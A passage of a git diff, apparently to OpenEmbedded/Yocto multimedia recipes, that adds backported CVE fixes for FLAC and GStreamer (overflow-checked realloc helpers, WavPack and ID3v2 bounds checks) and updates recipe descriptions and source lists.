++static inline void *safe_realloc_nofree_add_2op_(void *ptr, size_t size1, size_t size2)
++{
++ size2 += size1;
++ if(size2 < size1)
++ return 0;
++ return realloc(ptr, size2);
++}
++
++static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1) {
+ free(ptr);
+ return 0;
+ }
+- return realloc(ptr, size2);
++ size3 += size2;
++ if(size3 < size2) {
++ free(ptr);
++ return 0;
++ }
++ return safe_realloc_(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
++static inline void *safe_realloc_nofree_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -182,7 +195,7 @@ static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2,
+ return realloc(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
++static inline void *safe_realloc_nofree_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -205,6 +218,15 @@ static inline void *safe_realloc_mul_2op_(void *ptr, size_t size1, size_t size2)
+ return safe_realloc_(ptr, size1*size2);
+ }
+
++static inline void *safe_realloc_nofree_mul_2op_(void *ptr, size_t size1, size_t size2)
++{
++ if(!size1 || !size2)
++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ if(size1 > SIZE_MAX / size2)
++ return 0;
++ return realloc(ptr, size1*size2);
++}
++
+ /* size1 * (size2 + size3) */
+ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+@@ -216,4 +238,15 @@ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2,
+ return safe_realloc_mul_2op_(ptr, size1, size2);
+ }
+
++/* size1 * (size2 + size3) */
++static inline void *safe_realloc_nofree_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
++{
++ if(!size1 || (!size2 && !size3))
++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ size2 += size3;
++ if(size2 < size3)
++ return 0;
++ return safe_realloc_nofree_mul_2op_(ptr, size1, size2);
++}
++
+ #endif
+diff --git a/src/flac/encode.c b/src/flac/encode.c
+index a9b907f..f87250c 100644
+--- a/src/flac/encode.c
++++ b/src/flac/encode.c
+@@ -1743,10 +1743,10 @@ static void static_metadata_clear(static_metadata_t *m)
+ static FLAC__bool static_metadata_append(static_metadata_t *m, FLAC__StreamMetadata *d, FLAC__bool needs_delete)
+ {
+ void *x;
+- if(0 == (x = safe_realloc_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+ return false;
+ m->metadata = (FLAC__StreamMetadata**)x;
+- if(0 == (x = safe_realloc_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+ return false;
+ m->needs_delete = (FLAC__bool*)x;
+ m->metadata[m->num_metadata] = d;
+diff --git a/src/flac/foreign_metadata.c b/src/flac/foreign_metadata.c
+index 9ad9c18..fdfb3cf 100644
+--- a/src/flac/foreign_metadata.c
++++ b/src/flac/foreign_metadata.c
+@@ -75,7 +75,7 @@ static FLAC__bool copy_data_(FILE *fin, FILE *fout, size_t size, const char **er
+
+ static FLAC__bool append_block_(foreign_metadata_t *fm, FLAC__off_t offset, FLAC__uint32 size, const char **error)
+ {
+- foreign_block_t *fb = safe_realloc_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
++ foreign_block_t *fb = safe_realloc_nofree_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
+ if(fb) {
+ fb[fm->num_blocks].offset = offset;
+ fb[fm->num_blocks].size = size;
+diff --git a/src/libFLAC/bitwriter.c b/src/libFLAC/bitwriter.c
+index 6e86585..a510b0d 100644
+--- a/src/libFLAC/bitwriter.c
++++ b/src/libFLAC/bitwriter.c
+@@ -124,7 +124,7 @@ FLAC__bool bitwriter_grow_(FLAC__BitWriter *bw, uint32_t bits_to_add)
+ FLAC__ASSERT(new_capacity > bw->capacity);
+ FLAC__ASSERT(new_capacity >= bw->words + ((bw->bits + bits_to_add + FLAC__BITS_PER_WORD - 1) / FLAC__BITS_PER_WORD));
+
+- new_buffer = safe_realloc_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
++ new_buffer = safe_realloc_nofree_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
+ if(new_buffer == 0)
+ return false;
+ bw->buffer = new_buffer;
+diff --git a/src/libFLAC/metadata_object.c b/src/libFLAC/metadata_object.c
+index de8e513..aef65be 100644
+--- a/src/libFLAC/metadata_object.c
++++ b/src/libFLAC/metadata_object.c
+@@ -98,7 +98,7 @@ static FLAC__bool free_copy_bytes_(FLAC__byte **to, const FLAC__byte *from, uint
+ /* realloc() failure leaves entry unchanged */
+ static FLAC__bool ensure_null_terminated_(FLAC__byte **entry, uint32_t length)
+ {
+- FLAC__byte *x = safe_realloc_add_2op_(*entry, length, /*+*/1);
++ FLAC__byte *x = safe_realloc_nofree_add_2op_(*entry, length, /*+*/1);
+ if (x != NULL) {
+ x[length] = '\0';
+ *entry = x;
+diff --git a/src/plugin_common/tags.c b/src/plugin_common/tags.c
+index ae440c5..dfa10d3 100644
+--- a/src/plugin_common/tags.c
++++ b/src/plugin_common/tags.c
+@@ -317,7 +317,7 @@ FLAC__bool FLAC_plugin__tags_add_tag_utf8(FLAC__StreamMetadata *tags, const char
+ const size_t value_len = strlen(value);
+ const size_t separator_len = strlen(separator);
+ FLAC__byte *new_entry;
+- if(0 == (new_entry = safe_realloc_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
++ if(0 == (new_entry = safe_realloc_nofree_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
+ return false;
+ memcpy(new_entry+entry->length, separator, separator_len);
+ entry->length += separator_len;
+diff --git a/src/share/utf8/iconvert.c b/src/share/utf8/iconvert.c
+index 8ab53c1..876c06e 100644
+--- a/src/share/utf8/iconvert.c
++++ b/src/share/utf8/iconvert.c
+@@ -149,7 +149,7 @@ int iconvert(const char *fromcode, const char *tocode,
+ iconv_close(cd1);
+ return ret;
+ }
+- newbuf = safe_realloc_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
++ newbuf = safe_realloc_nofree_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
+ if (!newbuf)
+ goto fail;
+ ob = (ob - utfbuf) + newbuf;
+--
+2.40.0
diff --git a/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
new file mode 100644
index 0000000000..e19833a5ad
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
@@ -0,0 +1,34 @@
+From e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be Mon Sep 17 00:00:00 2001
+From: Neelkamal Semwal <neelkamal.semwal@ittiam.com>
+Date: Fri, 18 Dec 2020 22:28:36 +0530
+Subject: [PATCH] libFlac: Exit at EOS in verify mode
+
+When verify mode is enabled, once decoder flags end of stream,
+encode processing is considered complete.
+
+CVE-2021-0561
+
+Signed-off-by: Ralph Giles <giles@thaumas.net>
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be]
+CVE: CVE-2021-0561
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/libFLAC/stream_encoder.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/libFLAC/stream_encoder.c b/src/libFLAC/stream_encoder.c
+index 4c91247fe8..7109802c27 100644
+--- a/src/libFLAC/stream_encoder.c
++++ b/src/libFLAC/stream_encoder.c
+@@ -2610,7 +2610,9 @@ FLAC__bool write_bitbuffer_(FLAC__StreamEncoder *encoder, uint32_t samples, FLAC
+ encoder->private_->verify.needs_magic_hack = true;
+ }
+ else {
+- if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)) {
++ if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)
++ || (!is_last_block
++ && (FLAC__stream_encoder_get_verify_decoder_state(encoder) == FLAC__STREAM_DECODER_END_OF_STREAM))) {
+ FLAC__bitwriter_release_buffer(encoder->private_->frame);
+ FLAC__bitwriter_clear(encoder->private_->frame);
+ if(encoder->protected_->state != FLAC__STREAM_ENCODER_VERIFY_MISMATCH_IN_AUDIO_DATA)
diff --git a/meta/recipes-multimedia/flac/flac_1.3.3.bb b/meta/recipes-multimedia/flac/flac_1.3.3.bb
index cb6692aedf..e593727ac8 100644
--- a/meta/recipes-multimedia/flac/flac_1.3.3.bb
+++ b/meta/recipes-multimedia/flac/flac_1.3.3.bb
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING.FDL;md5=ad1419ecc56e060eccf8184a87c4285f \
DEPENDS = "libogg"
SRC_URI = "http://downloads.xiph.org/releases/flac/${BP}.tar.xz \
+ file://CVE-2020-22219.patch \
+ file://CVE-2021-0561.patch \
"
SRC_URI[md5sum] = "26703ed2858c1fc9ffc05136d13daa69"
diff --git a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
index cc7a7e78e2..6494013e3f 100644
--- a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
+++ b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
@@ -1,10 +1,13 @@
SUMMARY = "GStreamer examples (including gtk-play, gst-play)"
+DESCRIPTION = "GStreamer example applications"
+HOMEPAGE = "https://gitlab.freedesktop.org/gstreamer/gst-examples"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-examples/-/issues"
LICENSE = "LGPL-2.0+"
LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20;md5=f8c72dae3d36823ec716a9ebcae593b9"
DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native"
-SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \
file://0001-Make-player-examples-installable.patch \
file://gst-player.desktop \
"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
index 98355a1b75..a8ad777422 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Libav-based GStreamer 1.x plugin"
+DESCRIPTION = "Contains a GStreamer plugin for using the encoders, decoders, \
+muxers, and demuxers provided by FFmpeg."
HOMEPAGE = "http://gstreamer.freedesktop.org/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
index 1aa13cf73c..46653e2392 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
@@ -1,4 +1,5 @@
SUMMARY = "OpenMAX IL plugins for GStreamer"
+DESCRIPTION = "Wraps available OpenMAX IL components and makes them available as standard GStreamer elements."
HOMEPAGE = "http://gstreamer.freedesktop.org/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
index ffbaaf425a..f741db2172 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
@@ -1,5 +1,9 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Bad' GStreamer plugins and helper libraries "
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-bad/-/issues"
+
SRC_URI = " \
https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-${PV}.tar.xz \
file://0001-meson-build-gir-even-when-cross-compiling-if-introsp.patch \
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
new file mode 100644
index 0000000000..3717f0cf3a
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
@@ -0,0 +1,36 @@
+From 067e759136904b82bba9c6d1d781c4408dfecfe6 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Tim-Philipp=20M=C3=BCller?= <tim@centricular.com>
+Date: Wed, 3 Mar 2021 01:08:25 +0000
+Subject: [PATCH] tag: id3v2: fix frame size check and potential invalid reads
+
+Check the right variable when checking if there's
+enough data left to read the frame size.
+
+Closes https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues/876
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/merge_requests/1066>
+
+Upstream-Status: Backport
+[https://gstreamer.freedesktop.org/security/sa-2021-0001.html]
+CVE: CVE-2021-3522
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ gst-libs/gst/tag/id3v2frames.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gst-libs/gst/tag/id3v2frames.c b/gst-libs/gst/tag/id3v2frames.c
+index 8e9f782..f39659b 100644
+--- a/gst-libs/gst/tag/id3v2frames.c
++++ b/gst-libs/gst/tag/id3v2frames.c
+@@ -109,7 +109,7 @@ id3v2_parse_frame (ID3TagsWorking * work)
+
+ if (work->frame_flags & (ID3V2_FRAME_FORMAT_COMPRESSION |
+ ID3V2_FRAME_FORMAT_DATA_LENGTH_INDICATOR)) {
+- if (work->hdr.frame_data_size <= 4)
++ if (frame_data_size <= 4)
+ return FALSE;
+ if (ID3V2_VER_MAJOR (work->hdr.version) == 3) {
+ work->parse_size = GST_READ_UINT32_BE (frame_data);
+--
+2.17.1
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
index a4f4772c1c..bcfdef3bbd 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
@@ -1,5 +1,8 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Base' GStreamer plugins and helper libraries"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues"
LICENSE = "GPLv2+ & LGPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=6762ed442b3822387a51c92d928ead0d \
file://common/coverage/coverage-report.pl;beginline=2;endline=17;md5=a4e1830fce078028c8f0974161272607"
@@ -12,6 +15,7 @@ SRC_URI = " \
file://0003-ssaparse-enhance-SSA-text-lines-parsing.patch \
file://0005-viv-fb-Make-sure-config.h-is-included.patch \
file://0009-glimagesink-Downrank-to-marginal.patch \
+ file://CVE-2021-3522.patch \
"
SRC_URI[md5sum] = "e3ddb1bae9fb510b49a295f212f1e6e4"
SRC_URI[sha256sum] = "9f02678b0bbbcc9eff107d3bd89d83ce92fec2154cd607c7c8bd34dc7fee491c"
@@ -97,3 +101,5 @@ def get_opengl_cmdline_list(switch_name, options, d):
return '-D' + switch_name + '=' + ','.join(selected_options)
else:
return ''
+
+CVE_PRODUCT += "gst-plugins-base"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
new file mode 100644
index 0000000000..81f7c59a7b
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
@@ -0,0 +1,207 @@
+From 9181191511f9c0be6a89c98b311f49d66bd46dc3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Thu, 4 Mar 2021 13:05:19 +0200
+Subject: [PATCH] matroskademux: Fix extraction of multichannel WavPack
+
+The old code had a couple of issues that all lead to potential memory
+safety bugs.
+
+ - Use a constant for the Wavpack4Header size instead of using sizeof.
+ It's written out into the data and not from the struct and who knows
+ what special alignment/padding requirements some C compilers have.
+ - gst_buffer_set_size() does not realloc the buffer when setting a
+ bigger size than allocated, it only allows growing up to the maximum
+ allocated size. Instead use a GstAdapter to collect all the blocks
+ and take out everything at once in the end.
+ - Check that enough data is actually available in the input and
+ otherwise handle it an error in all cases instead of silently
+ ignoring it.
+
+Among other things this fixes out of bounds writes because the code
+assumed gst_buffer_set_size() can grow the buffer and simply wrote after
+the end of the buffer.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/859
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/9181191511f9c0be6a89c98b311f49d66bd46dc3?merge_request_iid=903
+CVE: CVE-2021-3497
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 99 +++++++++++++++++++----------------
+ gst/matroska/matroska-ids.h | 2 +
+ 2 files changed, 55 insertions(+), 46 deletions(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 467815986..0e47ee7b5 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3851,6 +3851,12 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ guint32 block_samples, tmp;
+ gsize size = gst_buffer_get_size (*buf);
+
++ if (size < 4) {
++ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ return GST_FLOW_ERROR;
++ }
++
+ gst_buffer_extract (*buf, 0, &tmp, sizeof (guint32));
+ block_samples = GUINT32_FROM_LE (tmp);
+ /* we need to reconstruct the header of the wavpack block */
+@@ -3858,10 +3864,10 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ /* -20 because ck_size is the size of the wavpack block -8
+ * and lace_size is the size of the wavpack block + 12
+ * (the three guint32 of the header that already are in the buffer) */
+- wvh.ck_size = size + sizeof (Wavpack4Header) - 20;
++ wvh.ck_size = size + WAVPACK4_HEADER_SIZE - 20;
+
+ /* block_samples, flags and crc are already in the buffer */
+- newbuf = gst_buffer_new_allocate (NULL, sizeof (Wavpack4Header) - 12, NULL);
++ newbuf = gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE - 12, NULL);
+
+ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+ data = outmap.data;
+@@ -3886,9 +3892,11 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ audiocontext->wvpk_block_index += block_samples;
+ } else {
+ guint8 *outdata = NULL;
+- guint outpos = 0;
+- gsize buf_size, size, out_size = 0;
++ gsize buf_size, size;
+ guint32 block_samples, flags, crc, blocksize;
++ GstAdapter *adapter;
++
++ adapter = gst_adapter_new ();
+
+ gst_buffer_map (*buf, &map, GST_MAP_READ);
+ buf_data = map.data;
+@@ -3897,6 +3905,7 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ if (buf_size < 4) {
+ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
+ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
+ return GST_FLOW_ERROR;
+ }
+
+@@ -3918,59 +3927,57 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ data += 4;
+ size -= 4;
+
+- if (blocksize == 0 || size < blocksize)
+- break;
+-
+- g_assert ((newbuf == NULL) == (outdata == NULL));
++ if (blocksize == 0 || size < blocksize) {
++ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
++ return GST_FLOW_ERROR;
++ }
+
+- if (newbuf == NULL) {
+- out_size = sizeof (Wavpack4Header) + blocksize;
+- newbuf = gst_buffer_new_allocate (NULL, out_size, NULL);
++ g_assert (newbuf == NULL);
+
+- gst_buffer_copy_into (newbuf, *buf,
+- GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++ newbuf =
++ gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE + blocksize,
++ NULL);
++ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
++ outdata = outmap.data;
++
++ outdata[0] = 'w';
++ outdata[1] = 'v';
++ outdata[2] = 'p';
++ outdata[3] = 'k';
++ outdata += 4;
++
++ GST_WRITE_UINT32_LE (outdata, blocksize + WAVPACK4_HEADER_SIZE - 8);
++ GST_WRITE_UINT16_LE (outdata + 4, wvh.version);
++ GST_WRITE_UINT8 (outdata + 6, wvh.track_no);
++ GST_WRITE_UINT8 (outdata + 7, wvh.index_no);
++ GST_WRITE_UINT32_LE (outdata + 8, wvh.total_samples);
++ GST_WRITE_UINT32_LE (outdata + 12, wvh.block_index);
++ GST_WRITE_UINT32_LE (outdata + 16, block_samples);
++ GST_WRITE_UINT32_LE (outdata + 20, flags);
++ GST_WRITE_UINT32_LE (outdata + 24, crc);
++ outdata += 28;
++
++ memcpy (outdata, data, blocksize);
+
+- outpos = 0;
+- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+- outdata = outmap.data;
+- } else {
+- gst_buffer_unmap (newbuf, &outmap);
+- out_size += sizeof (Wavpack4Header) + blocksize;
+- gst_buffer_set_size (newbuf, out_size);
+- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+- outdata = outmap.data;
+- }
++ gst_buffer_unmap (newbuf, &outmap);
++ gst_adapter_push (adapter, newbuf);
++ newbuf = NULL;
+
+- outdata[outpos] = 'w';
+- outdata[outpos + 1] = 'v';
+- outdata[outpos + 2] = 'p';
+- outdata[outpos + 3] = 'k';
+- outpos += 4;
+-
+- GST_WRITE_UINT32_LE (outdata + outpos,
+- blocksize + sizeof (Wavpack4Header) - 8);
+- GST_WRITE_UINT16_LE (outdata + outpos + 4, wvh.version);
+- GST_WRITE_UINT8 (outdata + outpos + 6, wvh.track_no);
+- GST_WRITE_UINT8 (outdata + outpos + 7, wvh.index_no);
+- GST_WRITE_UINT32_LE (outdata + outpos + 8, wvh.total_samples);
+- GST_WRITE_UINT32_LE (outdata + outpos + 12, wvh.block_index);
+- GST_WRITE_UINT32_LE (outdata + outpos + 16, block_samples);
+- GST_WRITE_UINT32_LE (outdata + outpos + 20, flags);
+- GST_WRITE_UINT32_LE (outdata + outpos + 24, crc);
+- outpos += 28;
+-
+- memmove (outdata + outpos, data, blocksize);
+- outpos += blocksize;
+ data += blocksize;
+ size -= blocksize;
+ }
+ gst_buffer_unmap (*buf, &map);
+- gst_buffer_unref (*buf);
+
+- if (newbuf)
+- gst_buffer_unmap (newbuf, &outmap);
++ newbuf = gst_adapter_take_buffer (adapter, gst_adapter_available (adapter));
++ g_object_unref (adapter);
+
++ gst_buffer_copy_into (newbuf, *buf,
++ GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++ gst_buffer_unref (*buf);
+ *buf = newbuf;
++
+ audiocontext->wvpk_block_index += block_samples;
+ }
+
+diff --git a/gst/matroska/matroska-ids.h b/gst/matroska/matroska-ids.h
+index 429213f77..8d4a685a9 100644
+--- a/gst/matroska/matroska-ids.h
++++ b/gst/matroska/matroska-ids.h
+@@ -688,6 +688,8 @@ typedef struct _Wavpack4Header {
+ guint32 crc; /* crc for actual decoded data */
+ } Wavpack4Header;
+
++#define WAVPACK4_HEADER_SIZE (32)
++
+ typedef enum {
+ GST_MATROSKA_TRACK_ENCODING_SCOPE_FRAME = (1<<0),
+ GST_MATROSKA_TRACK_ENCODING_SCOPE_CODEC_DATA = (1<<1),
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
new file mode 100644
index 0000000000..d3de2d5014
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
@@ -0,0 +1,44 @@
+From 02174790726dd20a5c73ce2002189bf240ad4fe0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 3 Mar 2021 11:31:52 +0200
+Subject: [PATCH] matroskademux: Initialize track context out parameter to NULL
+ before parsing
+
+Various error return paths don't set it to NULL and callers are only
+checking if the pointer is NULL. As it's allocated on the stack this
+usually contains random stack memory, and more often than not the memory
+of a previously parsed track.
+
+This then causes all kinds of memory corruptions further down the line.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/858
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport [
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/02174790726dd20a5c73ce2002189bf240ad4fe0?merge_request_iid=903 ]
+CVE: CVE-2021-3498
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 4d0234743..467815986 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -692,6 +692,8 @@ gst_matroska_demux_parse_stream (GstMatroskaDemux * demux, GstEbmlRead * ebml,
+
+ DEBUG_ELEMENT_START (demux, ebml, "TrackEntry");
+
++ *dest_context = NULL;
++
+ /* start with the master */
+ if ((ret = gst_ebml_read_master (ebml, &id)) != GST_FLOW_OK) {
+ DEBUG_ELEMENT_STOP (demux, ebml, "TrackEntry", ret);
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
new file mode 100644
index 0000000000..ee33c5564d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
@@ -0,0 +1,59 @@
+From cf887f1b8e228bff6e19829e6d03995d70ad739d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 10:23:15 +0300
+Subject: [PATCH] matroskademux: Avoid integer-overflow resulting in heap
+ corruption in WavPack header handling code
+
+blocksize + WAVPACK4_HEADER_SIZE might overflow gsize, which then
+results in allocating a very small buffer. Into that buffer blocksize
+data is memcpy'd later which then causes out of bound writes and can
+potentially lead to anything from crashes to remote code execution.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1920
+
+https://gstreamer.freedesktop.org/security/sa-2022-0004.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1226
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2612>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-demux.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 64cc6be60be..01d754c3eb9 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3933,7 +3933,8 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ } else {
+ guint8 *outdata = NULL;
+ gsize buf_size, size;
+- guint32 block_samples, flags, crc, blocksize;
++ guint32 block_samples, flags, crc;
++ gsize blocksize;
+ GstAdapter *adapter;
+
+ adapter = gst_adapter_new ();
+@@ -3974,6 +3975,13 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ return GST_FLOW_ERROR;
+ }
+
